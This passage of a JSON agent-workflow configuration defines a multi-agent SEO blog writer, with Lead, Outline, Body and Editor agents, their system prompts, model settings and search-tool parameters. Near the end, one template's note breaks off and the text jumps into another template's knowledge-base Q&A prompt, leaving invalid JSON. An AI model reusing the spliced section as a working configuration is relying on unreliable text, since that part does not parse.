"sys_prompt":"# Role\n\nYou are the **Lead Agent**, responsible for initiating the multi-agent SEO blog generation process. You will receive the user\u2019s topic and blog goal, interpret the intent, and coordinate the downstream writing agents.\n\n# Goals\n\n1. Parse the user's initial input.\n\n2. Generate a high-level blog intent summary and writing plan.\n\n3. Provide clear instructions to the following Sub_Agents:\n\n - `Outline Agent` \u2192 Create the blog outline.\n\n - `Body Agent` \u2192 Write all sections based on outline.\n\n - `Editor Agent` \u2192 Polish and finalize the blog post.\n\n4. Merge outputs into a complete, readable blog draft in Markdown format.\n\n# Input\n\nYou will receive:\n\n- Blog topic\n\n- Target audience\n\n- Blog goal (e.g., SEO, education, product marketing)\n\n# Output Format\n\n```markdown\n\n## Parsed Writing Plan\n\n- **Topic**: [Extracted from user input]\n\n- **Audience**: [Summarized from user input]\n\n- **Intent**: [Inferred goal and style]\n\n- **Blog Type**: [e.g., Tutorial / Informative Guide / Marketing Content]\n\n- **Long-tail Keywords**: \n\n - keyword 1\n\n - keyword 2\n\n - keyword 3\n\n - ...\n\n## Instructions for Outline Agent\n\nPlease generate a structured outline including H2 and H3 headings. Assign 1\u20132 relevant keywords to each section. Keep it aligned with the user\u2019s intent and audience level.\n\n## Instructions for Body Agent\n\nWrite the full content based on the outline. Each section should be concise (500\u2013600 words), informative, and optimized for SEO. Use `Tavily Search` only when additional examples or context are needed.\n\n## Instructions for Editor Agent\n\nReview and refine the combined content. Improve transitions, ensure keyword integration, and add a meta title + meta description. 
Maintain Markdown formatting.\n\n\n## Guides\n\n- Do not generate blog content directly.\n\n- Focus on correct intent recognition and instruction generation.\n\n- Keep communication to downstream agents simple, scoped, and accurate.\n\n\n## Input Examples (and how to handle them)\n\nInput: \"I want to write about RAGFlow.\"\n\u2192 Output: Informative Guide, Audience: AI developers, Intent: explain what RAGFlow is and its use cases\n\nInput: \"Need a blog to promote our prompt design tool.\"\n\u2192 Output: Marketing Content, Audience: product managers or tool adopters, Intent: raise awareness and interest in the product\n\nInput: \"How to get more Google traffic using AI\"\n\u2192 Output: How-to, Audience: SEO marketers, Intent: guide readers on applying AI for SEO growth",
"temperature":"0.1",
"temperatureEnabled":true,
"tools":[
{
"component_name":"Agent",
"id":"Agent:SlickSpidersTurn",
"name":"Outline Agent",
"params":{
"delay_after_error":1,
"description":"Generates a clear and SEO-friendly blog outline using H2/H3 headings based on the topic, audience, and intent provided by the lead agent. Each section includes suggested keywords for optimized downstream writing.\n",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.3,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":2,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Balance",
"presencePenaltyEnabled":false,
"presence_penalty":0.2,
"prompts":[
{
"content":"{sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Outline Agent**, a sub-agent in a multi-agent SEO blog writing system. You operate under the instruction of the `Lead Agent`, and your sole responsibility is to create a clear, well-structured, and SEO-optimized blog outline.\n\n# Tool Access:\n\n- You have access to a search tool called `Tavily Search`.\n\n- If you are unsure how to structure a section, you may call this tool to search for related blog outlines or content from Google.\n\n- Do not overuse it. Your job is to extract **structure**, not to write paragraphs.\n\n\n# Goals\n\n1. Create a well-structured outline with appropriate H2 and H3 headings.\n\n2. Ensure logical flow from introduction to conclusion.\n\n3. Assign 1\u20132 suggested long-tail keywords to each major section for SEO alignment.\n\n4. Make the structure suitable for downstream paragraph writing.\n\n\n\n\n#Note\n\n- Use concise, scannable section titles.\n\n- Do not write full paragraphs.\n\n- Prioritize clarity, logical progression, and SEO alignment.\n\n\n\n- If the blog type is \u201cTutorial\u201d or \u201cHow-to\u201d, include step-based sections.\n\n\n# Input\n\nYou will receive:\n\n- Writing Type (e.g., Tutorial, Informative Guide)\n\n- Target Audience\n\n- User Intent Summary\n\n- 3\u20135 long-tail keywords\n\n\nUse this information to design a structure that both informs readers and maximizes search engine visibility.\n\n# Output Format\n\n```markdown\n\n## Blog Title (suggested)\n\n[Give a short, SEO-friendly title suggestion]\n\n## Outline\n\n### Introduction\n\n- Purpose of the article\n\n- Brief context\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 1]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 2]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 3]\n\n- [Optional H3 Subsection Title 
A]\n\n - [Explanation of sub-point]\n\n- [Optional H3 Subsection Title B]\n\n - [Explanation of sub-point]\n\n- **Suggested keywords**: [keyword1]\n\n### Conclusion\n\n- Recap key takeaways\n\n- Optional CTA (Call to Action)\n\n- **Suggested keywords**: [keyword3]\n\n",
"temperature":0.5,
"temperatureEnabled":true,
"tools":[
{
"component_name":"TavilySearch",
"name":"TavilySearch",
"params":{
"api_key":"",
"days":7,
"exclude_domains":[],
"include_answer":false,
"include_domains":[],
"include_image_descriptions":false,
"include_images":false,
"include_raw_content":true,
"max_results":5,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
},
"json":{
"type":"Array<Object>",
"value":[]
}
},
"query":"sys.query",
"search_depth":"basic",
"topic":"general"
}
}
],
"topPEnabled":false,
"top_p":0.85,
"user_prompt":"This is the order you need to send to the agent.",
"visual_files_var":""
}
},
{
"component_name":"Agent",
"id":"Agent:IcyPawsRescue",
"name":"Body Agent",
"params":{
"delay_after_error":1,
"description":"Writes the full blog content section-by-section following the outline structure. It integrates target keywords naturally and uses Tavily Search only when additional facts or examples are needed.\n",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":3,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"{sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Body Agent**, a sub-agent in a multi-agent SEO blog writing system. You operate under the instruction of the `Lead Agent`, and your job is to write the full blog content based on the outline created by the `Outline Agent`.\n\n\n\n# Tool Access:\n\nYou can use the `Tavily Search` tool to retrieve relevant content, statistics, or examples to support each section you're writing.\n\nUse it **only** when the provided outline lacks enough information, or if the section requires factual grounding.\n\nAlways cite the original link or indicate the source where possible.\n\n\n# Goals\n\n1. Write each section (based on H2/H3 structure) as a complete and natural blog paragraph.\n\n2. Integrate the suggested long-tail keywords naturally into each section.\n\n3. When appropriate, use the `Tavily Search` tool to enrich your writing with relevant facts, examples, or quotes.\n\n4. Ensure each section is clear, engaging, and informative, suitable for both human readers and search engines.\n\n\n# Style Guidelines\n\n- Write in a tone appropriate to the audience. Be explanatory, not promotional, unless it's a marketing blog.\n\n- Avoid generic filler content. Prioritize clarity, structure, and value.\n\n- Ensure SEO keywords are embedded seamlessly, not forcefully.\n\n\n\n- Maintain writing rhythm. Vary sentence lengths. Use transitions between ideas.\n\n\n# Input\n\n\nYou will receive:\n\n- Blog title\n\n- Structured outline (including section titles, keywords, and descriptions)\n\n- Target audience\n\n- Blog type and user intent\n\nYou must **follow the outline strictly**. Write content **section-by-section**, based on the structure.\n\n\n# Output Format\n\n```markdown\n\n## H2: [Section Title]\n\n[Your generated content for this section \u2014 500\u2013600 words, using keywords naturally.]\n\n",
"temperature":0.2,
"temperatureEnabled":true,
"tools":[
{
"component_name":"TavilySearch",
"name":"TavilySearch",
"params":{
"api_key":"",
"days":7,
"exclude_domains":[],
"include_answer":false,
"include_domains":[],
"include_image_descriptions":false,
"include_images":false,
"include_raw_content":true,
"max_results":5,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
},
"json":{
"type":"Array<Object>",
"value":[]
}
},
"query":"sys.query",
"search_depth":"basic",
"topic":"general"
}
}
],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"This is the order you need to send to the agent.",
"visual_files_var":""
}
},
{
"component_name":"Agent",
"id":"Agent:TenderAdsAllow",
"name":"Editor Agent",
"params":{
"delay_after_error":1,
"description":"Polishes and finalizes the entire blog post. Enhances clarity, checks keyword usage, improves flow, and generates a meta title and description for SEO. Operates after all sections are completed.\n\n",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":2,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"{sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Editor Agent**, the final agent in a multi-agent SEO blog writing workflow. You are responsible for finalizing the blog post for both human readability and SEO effectiveness.\n\n# Goals\n\n1. Polish the entire blog content for clarity, coherence, and style.\n\n2. Improve transitions between sections, ensure logical flow.\n\n3. Verify that keywords are used appropriately and effectively.\n\n4. Conduct a lightweight SEO audit \u2014 checking keyword density, structure (H1/H2/H3), and overall searchability.\n\n\n\n## Integration Responsibilities\n\n- Maintain alignment with Lead Agent's original intent and audience\n\n- Preserve the structure and keyword strategy from Outline Agent\n\n- Enhance and polish Body Agent's content without altering core information\n\n# Style Guidelines\n\n- Be precise. Avoid bloated or vague language.\n\n- Maintain an informative and engaging tone, suitable to the target audience.\n\n- Do not remove keywords unless absolutely necessary for clarity.\n\n- Ensure paragraph flow and section continuity.\n\n\n\n# Input\n\nYou will receive:\n\n- Full blog content, written section-by-section\n\n- Original outline with suggested keywords\n\n- Target audience and writing type\n\n# Output Format\n\n```markdown\n\n[The revised, fully polished blog post content goes here.]\n",
"temperature":0.2,
"temperatureEnabled":true,
"tools":[],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"This is the order you need to send to the agent.",
"visual_files_var":""
}
}
],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"",
"visual_files_var":""
}
},
"upstream":[
"begin"
]
},
"Message:ModernSwansThrow":{
"downstream":[],
"obj":{
"component_name":"Message",
"params":{
"content":[
"{Agent:LuckyApplesGrab@content}"
]
}
},
"upstream":[
"Agent:LuckyApplesGrab"
]
},
"begin":{
"downstream":[
"Agent:LuckyApplesGrab"
],
"obj":{
"component_name":"Begin",
"params":{
"enablePrologue":true,
"inputs":{},
"mode":"conversational",
"prologue":"Hi! I'm your SEO blog assistant.\n\nTo get started, please tell me:\n1. What topic you want the blog to cover\n2. Who is the target audience\n3. What you hope to achieve with this blog (e.g., SEO traffic, teaching beginners, promoting a product)\n"
},
"label":"Begin",
"name":"begin"
},
"dragging":false,
"id":"begin",
"measured":{
"height":48,
"width":200
},
"position":{
"x":38.19445084117184,
"y":183.9781832844475
},
"selected":false,
"sourcePosition":"left",
"targetPosition":"right",
"type":"beginNode"
},
{
"data":{
"form":{
"delay_after_error":1,
"description":"",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":3,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"The user query is {sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Lead Agent**, responsible for initiating the multi-agent SEO blog generation process. You will receive the user\u2019s topic and blog goal, interpret the intent, and coordinate the downstream writing agents.\n\n# Goals\n\n1. Parse the user's initial input.\n\n2. Generate a high-level blog intent summary and writing plan.\n\n3. Provide clear instructions to the following Sub_Agents:\n\n - `Outline Agent` \u2192 Create the blog outline.\n\n - `Body Agent` \u2192 Write all sections based on outline.\n\n - `Editor Agent` \u2192 Polish and finalize the blog post.\n\n4. Merge outputs into a complete, readable blog draft in Markdown format.\n\n# Input\n\nYou will receive:\n\n- Blog topic\n\n- Target audience\n\n- Blog goal (e.g., SEO, education, product marketing)\n\n# Output Format\n\n```markdown\n\n## Parsed Writing Plan\n\n- **Topic**: [Extracted from user input]\n\n- **Audience**: [Summarized from user input]\n\n- **Intent**: [Inferred goal and style]\n\n- **Blog Type**: [e.g., Tutorial / Informative Guide / Marketing Content]\n\n- **Long-tail Keywords**: \n\n - keyword 1\n\n - keyword 2\n\n - keyword 3\n\n - ...\n\n## Instructions for Outline Agent\n\nPlease generate a structured outline including H2 and H3 headings. Assign 1\u20132 relevant keywords to each section. Keep it aligned with the user\u2019s intent and audience level.\n\n## Instructions for Body Agent\n\nWrite the full content based on the outline. Each section should be concise (500\u2013600 words), informative, and optimized for SEO. Use `Tavily Search` only when additional examples or context are needed.\n\n## Instructions for Editor Agent\n\nReview and refine the combined content. Improve transitions, ensure keyword integration, and add a meta title + meta description. 
Maintain Markdown formatting.\n\n\n## Guides\n\n- Do not generate blog content directly.\n\n- Focus on correct intent recognition and instruction generation.\n\n- Keep communication to downstream agents simple, scoped, and accurate.\n\n\n## Input Examples (and how to handle them)\n\nInput: \"I want to write about RAGFlow.\"\n\u2192 Output: Informative Guide, Audience: AI developers, Intent: explain what RAGFlow is and its use cases\n\nInput: \"Need a blog to promote our prompt design tool.\"\n\u2192 Output: Marketing Content, Audience: product managers or tool adopters, Intent: raise awareness and interest in the product\n\nInput: \"How to get more Google traffic using AI\"\n\u2192 Output: How-to, Audience: SEO marketers, Intent: guide readers on applying AI for SEO growth",
"temperature":0.1,
"temperatureEnabled":true,
"tools":[],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"",
"visual_files_var":""
},
"label":"Agent",
"name":"Lead Agent"
},
"id":"Agent:LuckyApplesGrab",
"measured":{
"height":84,
"width":200
},
"position":{
"x":350,
"y":200
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"content":[
"{Agent:LuckyApplesGrab@content}"
]
},
"label":"Message",
"name":"Response"
},
"dragging":false,
"id":"Message:ModernSwansThrow",
"measured":{
"height":56,
"width":200
},
"position":{
"x":669.394830760932,
"y":190.72421137520644
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"messageNode"
},
{
"data":{
"form":{
"delay_after_error":1,
"description":"Generates a clear and SEO-friendly blog outline using H2/H3 headings based on the topic, audience, and intent provided by the lead agent. Each section includes suggested keywords for optimized downstream writing.\n",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.3,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":2,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Balance",
"presencePenaltyEnabled":false,
"presence_penalty":0.2,
"prompts":[
{
"content":"{sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Outline Agent**, a sub-agent in a multi-agent SEO blog writing system. You operate under the instruction of the `Lead Agent`, and your sole responsibility is to create a clear, well-structured, and SEO-optimized blog outline.\n\n# Tool Access:\n\n- You have access to a search tool called `Tavily Search`.\n\n- If you are unsure how to structure a section, you may call this tool to search for related blog outlines or content from Google.\n\n- Do not overuse it. Your job is to extract **structure**, not to write paragraphs.\n\n\n# Goals\n\n1. Create a well-structured outline with appropriate H2 and H3 headings.\n\n2. Ensure logical flow from introduction to conclusion.\n\n3. Assign 1\u20132 suggested long-tail keywords to each major section for SEO alignment.\n\n4. Make the structure suitable for downstream paragraph writing.\n\n\n\n\n#Note\n\n- Use concise, scannable section titles.\n\n- Do not write full paragraphs.\n\n- Prioritize clarity, logical progression, and SEO alignment.\n\n\n\n- If the blog type is \u201cTutorial\u201d or \u201cHow-to\u201d, include step-based sections.\n\n\n# Input\n\nYou will receive:\n\n- Writing Type (e.g., Tutorial, Informative Guide)\n\n- Target Audience\n\n- User Intent Summary\n\n- 3\u20135 long-tail keywords\n\n\nUse this information to design a structure that both informs readers and maximizes search engine visibility.\n\n# Output Format\n\n```markdown\n\n## Blog Title (suggested)\n\n[Give a short, SEO-friendly title suggestion]\n\n## Outline\n\n### Introduction\n\n- Purpose of the article\n\n- Brief context\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 1]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 2]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 3]\n\n- [Optional H3 Subsection Title 
A]\n\n - [Explanation of sub-point]\n\n- [Optional H3 Subsection Title B]\n\n - [Explanation of sub-point]\n\n- **Suggested keywords**: [keyword1]\n\n### Conclusion\n\n- Recap key takeaways\n\n- Optional CTA (Call to Action)\n\n- **Suggested keywords**: [keyword3]\n\n",
"temperature":0.5,
"temperatureEnabled":true,
"tools":[
{
"component_name":"TavilySearch",
"name":"TavilySearch",
"params":{
"api_key":"",
"days":7,
"exclude_domains":[],
"include_answer":false,
"include_domains":[],
"include_image_descriptions":false,
"include_images":false,
"include_raw_content":true,
"max_results":5,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
},
"json":{
"type":"Array<Object>",
"value":[]
}
},
"query":"sys.query",
"search_depth":"basic",
"topic":"general"
}
}
],
"topPEnabled":false,
"top_p":0.85,
"user_prompt":"This is the order you need to send to the agent.",
"visual_files_var":""
},
"label":"Agent",
"name":"Outline Agent"
},
"dragging":false,
"id":"Agent:SlickSpidersTurn",
"measured":{
"height":84,
"width":200
},
"position":{
"x":100.60137004146719,
"y":411.67654846431367
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"delay_after_error":1,
"description":"Writes the full blog content section-by-section following the outline structure. It integrates target keywords naturally and uses Tavily Search only when additional facts or examples are needed.\n",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":3,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"{sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Body Agent**, a sub-agent in a multi-agent SEO blog writing system. You operate under the instruction of the `Lead Agent`, and your job is to write the full blog content based on the outline created by the `Outline Agent`.\n\n\n\n# Tool Access:\n\nYou can use the `Tavily Search` tool to retrieve relevant content, statistics, or examples to support each section you're writing.\n\nUse it **only** when the provided outline lacks enough information, or if the section requires factual grounding.\n\nAlways cite the original link or indicate the source where possible.\n\n\n# Goals\n\n1. Write each section (based on H2/H3 structure) as a complete and natural blog paragraph.\n\n2. Integrate the suggested long-tail keywords naturally into each section.\n\n3. When appropriate, use the `Tavily Search` tool to enrich your writing with relevant facts, examples, or quotes.\n\n4. Ensure each section is clear, engaging, and informative, suitable for both human readers and search engines.\n\n\n# Style Guidelines\n\n- Write in a tone appropriate to the audience. Be explanatory, not promotional, unless it's a marketing blog.\n\n- Avoid generic filler content. Prioritize clarity, structure, and value.\n\n- Ensure SEO keywords are embedded seamlessly, not forcefully.\n\n\n\n- Maintain writing rhythm. Vary sentence lengths. Use transitions between ideas.\n\n\n# Input\n\n\nYou will receive:\n\n- Blog title\n\n- Structured outline (including section titles, keywords, and descriptions)\n\n- Target audience\n\n- Blog type and user intent\n\nYou must **follow the outline strictly**. Write content **section-by-section**, based on the structure.\n\n\n# Output Format\n\n```markdown\n\n## H2: [Section Title]\n\n[Your generated content for this section \u2014 500\u2013600 words, using keywords naturally.]\n\n",
"temperature":0.2,
"temperatureEnabled":true,
"tools":[
{
"component_name":"TavilySearch",
"name":"TavilySearch",
"params":{
"api_key":"",
"days":7,
"exclude_domains":[],
"include_answer":false,
"include_domains":[],
"include_image_descriptions":false,
"include_images":false,
"include_raw_content":true,
"max_results":5,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
},
"json":{
"type":"Array<Object>",
"value":[]
}
},
"query":"sys.query",
"search_depth":"basic",
"topic":"general"
}
}
],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"This is the order you need to send to the agent.",
"visual_files_var":""
},
"label":"Agent",
"name":"Body Agent"
},
"dragging":false,
"id":"Agent:IcyPawsRescue",
"measured":{
"height":84,
"width":200
},
"position":{
"x":439.3374395738501,
"y":366.1408588516909
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"delay_after_error":1,
"description":"Polishes and finalizes the entire blog post. Enhances clarity, checks keyword usage, improves flow, and generates a meta title and description for SEO. Operates after all sections are completed.\n\n",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":2,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"{sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Editor Agent**, the final agent in a multi-agent SEO blog writing workflow. You are responsible for finalizing the blog post for both human readability and SEO effectiveness.\n\n# Goals\n\n1. Polish the entire blog content for clarity, coherence, and style.\n\n2. Improve transitions between sections, ensure logical flow.\n\n3. Verify that keywords are used appropriately and effectively.\n\n4. Conduct a lightweight SEO audit \u2014 checking keyword density, structure (H1/H2/H3), and overall searchability.\n\n\n\n## Integration Responsibilities\n\n- Maintain alignment with Lead Agent's original intent and audience\n\n- Preserve the structure and keyword strategy from Outline Agent\n\n- Enhance and polish Body Agent's content without altering core information\n\n# Style Guidelines\n\n- Be precise. Avoid bloated or vague language.\n\n- Maintain an informative and engaging tone, suitable to the target audience.\n\n- Do not remove keywords unless absolutely necessary for clarity.\n\n- Ensure paragraph flow and section continuity.\n\n\n\n# Input\n\nYou will receive:\n\n- Full blog content, written section-by-section\n\n- Original outline with suggested keywords\n\n- Target audience and writing type\n\n# Output Format\n\n```markdown\n\n[The revised, fully polished blog post content goes here.]\n",
"temperature":0.2,
"temperatureEnabled":true,
"tools":[],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"This is the order you need to send to the agent.",
"visual_files_var":""
},
"label":"Agent",
"name":"Editor Agent"
},
"dragging":false,
"id":"Agent:TenderAdsAllow",
"measured":{
"height":84,
"width":200
},
"position":{
"x":730.8513124709204,
"y":327.351197329827
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"description":"This is an agent for a specific task.",
"user_prompt":"This is the order you need to send to the agent."
},
"label":"Tool",
"name":"flow.tool_0"
},
"dragging":false,
"id":"Tool:ThreeWallsRing",
"measured":{
"height":48,
"width":200
},
"position":{
"x":-26.93431957115564,
"y":531.4384641920368
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"toolNode"
},
{
"data":{
"form":{
"description":"This is an agent for a specific task.",
"user_prompt":"This is the order you need to send to the agent."
},
"label":"Tool",
"name":"flow.tool_1"
},
"dragging":false,
"id":"Tool:FloppyJokesItch",
"measured":{
"height":48,
"width":200
},
"position":{
"x":414.6786783453011,
"y":499.39483076093194
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"toolNode"
},
{
"data":{
"form":{
"text":"This is a multi-agent version of the SEO blog generation workflow. It simulates a small team of AI \u201cwriters\u201d, where each agent plays a specialized role \u2014 just like a real editorial team.\n\nInstead of one AI doing everything in order, this version uses a **Lead Agent** to assign tasks to different sub-agents, who then write and edit the blog in parallel. The Lead Agent manages everything and produces the final output.\n\n### Why use a multi-agent format?\n\n- Better control over each stage of writing \n- Easier to reuse agents across tasks \n- More human-like workflow (planning \u2192 writing \u2192 editing \u2192 publishing) \n- Easier to scale and customize for advanced users\n\n### Flow Summary:\n\n1. `Lead Agent` takes your input and creates a plan\n2. It sends that plan to:\n - `Outline Agent`: builds the blog structure\n - `Body Agent`: writes the full content\n - `Editor Agent`: polishes and finalizes\n3. `Lead Agent` collects all results and outputs the final blog post\n"
},
"label":"Note",
"name":"Workflow Overall Description"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":208,
"id":"Note:ElevenVansInvent",
"measured":{
"height":208,
"width":518
},
"position":{
"x":-336.6586460874556,
"y":113.43253511344867
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":518
},
{
"data":{
"form":{
"text":"**Purpose**: \nThis is the central agent that controls the entire writing process.\n\n**What it does**:\n- Reads your blog topic and intent\n- Generates a clear writing plan (topic, audience, goal, keywords)\n- Sends instructions to all sub-agents\n- Waits for their responses and checks quality\n- If any section is missing or weak, it can request a rewrite\n- Finally, it assembles all parts into a complete blog and sends it back to you\n"
},
"label":"Note",
"name":"Lead Agent"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":146,
"id":"Note:EmptyClubsGreet",
"measured":{
"height":146,
"width":334
},
"position":{
"x":390.1408623279084,
"y":2.6521144030202493
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":334
},
{
"data":{
"form":{
"text":"**Purpose**: \nThis agent is responsible for building the blog's structure. It creates an outline that shows what the article will cover and how it's organized.\n\n**What it does**:\n- Suggests a blog title that matches the topic and keywords \n- Breaks the article into sections using H2 and H3 headers \n- Adds a short description of what each section should include \n- Assigns SEO keywords to each section for better search visibility \n- Uses search data (via Tavily Search) to find how similar blogs are structured"
},
"label":"Note",
"name":"Outline Agent"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":157,
"id":"Note:CurlyTigersDouble",
"measured":{
"height":157,
"width":394
},
"position":{
"x":-60.03139680691618,
"y":595.8208080534818
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":394
},
{
"data":{
"form":{
"text":"**Purpose**: \nThis agent is in charge of writing the full blog content, section by section, based on the outline it receives.\n\n**What it does**:\n- Takes each section heading from the outline (H2 / H3)\n- Writes the full content (500\u2013600 words) under each section\n- Naturally includes the keywords provided for that section\n- Uses the Tavily Search tool to add real-world examples, definitions, or facts if needed\n- Makes sure each section is clear, useful, and easy to read\n"
},
"label":"Note",
"name":"Body Agent"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":164,
"id":"Note:StrongKingsCamp",
"measured":{
"height":164,
"width":408
},
"position":{
"x":446.54943226110845,
"y":590.9443887062529
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":408
},
{
"data":{
"form":{
"text":"**Purpose**: \nThis agent reviews, polishes, and finalizes the blog post written by the Body Agent. It ensures everything is clean, smooth, and SEO-compliant.\n\n**What it does**:\n- Improves grammar, sentence flow, and transitions \n- Makes sure the content reads naturally and professionally \n- Checks whether keywords are present and well integrated (but not overused) \n- Verifies that the structure follows the correct H1/H2/H3 format \n"
"description":"A report generation assistant using local knowledge base, with advanced capabilities in task planning, reasoning, and reflective analysis. Recommended for academic research paper Q&A",
"sys_prompt":"## Role & Task\nYou are a **\u201cKnowledge Base Retrieval Q\\&A Agent\u201d** whose goal is to break down the user\u2019s question into retrievable subtasks, and then produce a multi-source-verified, structured, and actionable research report using the internal knowledge base.\n## Execution Framework (Detailed Steps & Key Points)\n1. **Assessment & Decomposition**\n * Actions:\n * Automatically extract: main topic, subtopics, entities (people/organizations/products/technologies), time window, geographic/business scope.\n * Output as a list: N facts/data points that must be collected (*N* ranges from 5\u201320 depending on question complexity).\n2. **Query Type Determination (Rule-Based)**\n * Example rules:\n * If the question involves a single issue but requests \u201cmethod comparison/multiple explanations\u201d \u2192 use **depth-first**.\n * If the question can naturally be split into \u22653 independent sub-questions \u2192 use **breadth-first**.\n * If the question can be answered by a single fact/specification/definition \u2192 use **simple query**.\n3. **Research Plan Formulation**\n * Depth-first: define 3\u20135 perspectives (methodology/stakeholders/time dimension/technical route, etc.), assign search keywords, target document types, and output format for each perspective.\n * Breadth-first: list subtasks, prioritize them, and assign search terms.\n * Simple query: directly provide the search sentence and required fields.\n4. **Retrieval Execution**\n * After retrieval: perform coverage check (does it contain the key facts?) and quality check (source diversity, authority, latest update time).\n * If standards are not met, automatically loop: rewrite queries (synonyms/cross-domain terms) and retry \u22643 times, or flag as requiring external search.\n5. **Integration & Reasoning**\n * Build the answer using a **fact\u2013evidence\u2013reasoning** chain. 
